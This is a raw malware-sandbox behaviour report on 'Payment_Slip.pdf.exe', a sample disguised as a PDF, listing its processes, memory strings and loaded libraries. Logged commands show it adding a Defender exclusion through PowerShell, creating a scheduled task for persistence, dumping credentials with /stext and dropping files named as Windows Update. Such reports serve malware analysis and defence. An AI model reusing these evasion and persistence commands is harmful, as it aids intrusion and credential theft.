Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000F.00000002.1222989805.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: conserver.exe, 0000000D.00000002.3619471195.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 0000000E.00000002.1244293689.0000000003098000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Payment_Slip.pdf.exe Virustotal: Detection: 45%
Source: Payment_Slip.pdf.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File read: C:\Users\user\Desktop\Payment_Slip.pdf.exe
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe C:\Users\user\AppData\Roaming\mHTmhPhJy.exe
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
